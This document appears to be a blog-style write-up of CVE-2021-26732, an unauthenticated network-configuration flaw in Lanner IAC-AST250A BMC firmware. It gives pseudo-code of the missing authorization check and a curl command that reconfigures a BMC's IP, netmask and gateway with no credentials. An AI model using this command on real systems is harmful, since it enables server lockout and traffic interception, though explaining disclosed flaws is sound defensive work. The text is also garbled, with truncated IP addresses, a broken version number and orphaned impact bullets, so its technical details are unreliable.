CVE-2021-26732 - How a Broken Access Control in Lanner IAC-AST250A Lets Attackers Take Over BMC Network Settings

Date: June 2024  
Author: Security Researcher


When we talk about security in server management hardware, the Baseboard Management Controller (BMC) is always right at the center. A vulnerable BMC means an attacker could take over your servers, even before the Operating System loads. That's why vulnerabilities like CVE-2021-26732 are a big deal.

Let’s break down CVE-2021-26732—a broken access control vulnerability in the First_network_func function of the spx_restservice in the Lanner Inc IAC-AST250A standard firmware (version 1.10.). In simple terms, anyone with network access and some know-how can arbitrarily change the BMC’s network configuration, leading to big trouble.

What’s Lanner IAC-AST250A?

Lanner is a well-known manufacturer of industrial computers and network appliances. The IAC-AST250A is a board controller that manages server hardware, its firmware (version 1.10. being affected), and offers web services via its spx_restservice program for configuration.

What’s the CVE About?

- Vulnerability: Broken access control in the First_network_func function inside the spx_restservice web API.
- Impact: Anyone can alter network settings, possibly taking the server offline, rerouting traffic, or opening backdoors.

The Technical Walkthrough

Let’s look at what’s happening under the hood.

The Problem Function

Here’s what usually happens: A RESTful API running in spx_restservice should *check* if a user asking to change sensitive network settings is authenticated and allowed to do so. In this case, the First_network_func didn't check permissions.

Here’s a simplified pseudo-code of the issue

int First_network_func(Request *req) {
    char *new_ip = req_get_param(req, "ipaddr");
    char *new_mask = req_get_param(req, "netmask");
    char *new_gw = req_get_param(req, "gateway");

    // MISSING: Check if the requester is authenticated/authorized!

    // Apply network settings without authorization
    set_ip_address(new_ip);
    set_netmask(new_mask);
    set_gateway(new_gw);

    return HTTP_200_OK;
}

In the above, there is simply no check on who is making the request.

Exploit Details

If you can access the web API port (often 443 or 80), you can *POST* a new config and flip the network however you want.

Here’s how an attacker might exploit it using curl

curl -k -X POST https://<BMC-IP>/api/First_network_func \
    -d '{"ipaddr":"10...123","netmask":"255.255.255.","gateway":"10...1"}' \
    -H "Content-Type: application/json"

No authentication required.
No token, no password, nothing.

Just posting to the right endpoint and the BMC will change its network settings to the attacker’s choosing.

Redirecting admin traffic (MITM)

- Exposing BMC to public/external networks

Impact

- Loss of Control: Admins may get locked out if attacker changes IP/gateway.

How Was It Discovered?

Researchers found that endpoints in spx_restservice would honor configuration requests even if not authenticated.

Some background reading

- NIST NVD Entry for CVE-2021-26732
- Lanner’s Product Page with Firmware Info

Conclusion

CVE-2021-26732 is another reminder: Default configurations, even in secure industrial equipment, might not enforce the checks we expect. If you manage Lanner equipment, make sure you audit your BMC firmware versions and lock down access—unless you want someone else writing your server’s network playbook.

References

- NVD Entry for CVE-2021-26732
- Lanner IAC-AST250A Product Overview
- CVE Details Page


*If you want more deep dives on firmware vulnerabilities and responsible disclosure, follow this channel!*

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/24/2022 18:19:00 UTC